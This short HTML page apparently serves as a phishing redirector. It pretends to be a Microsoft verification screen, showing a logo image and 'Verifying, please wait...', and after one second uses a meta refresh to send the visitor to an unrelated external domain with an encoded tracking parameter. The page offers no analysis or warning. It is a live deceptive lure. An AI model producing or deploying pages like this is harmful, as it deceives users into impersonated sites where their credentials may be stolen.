<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="refresh" content="1; url=https://nanned.live/i/?bGFuZz1lbiZzdj1nZW5lcmFsJnJib3g9ZHNheW1vbm04OA">
    <title>Verifying</title>
    <style>
        body {
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            font-family: Arial, sans-serif;
            background-color: #f9f9f9;
        }
        .logo {
            width: 100px; /* Adjust size as needed */
            margin-bottom: -16px;
        }
        .text {
            font-size: 18px;
            color: #333;
        }
    </style>
</head>
<body>
    <img class="logo" src="https://i.ibb.co/8xMXKNd/1upj-1.gif" alt="Microsoft Logo">
    <p class="text">Verifying, please wait...</p>
</body>
</html>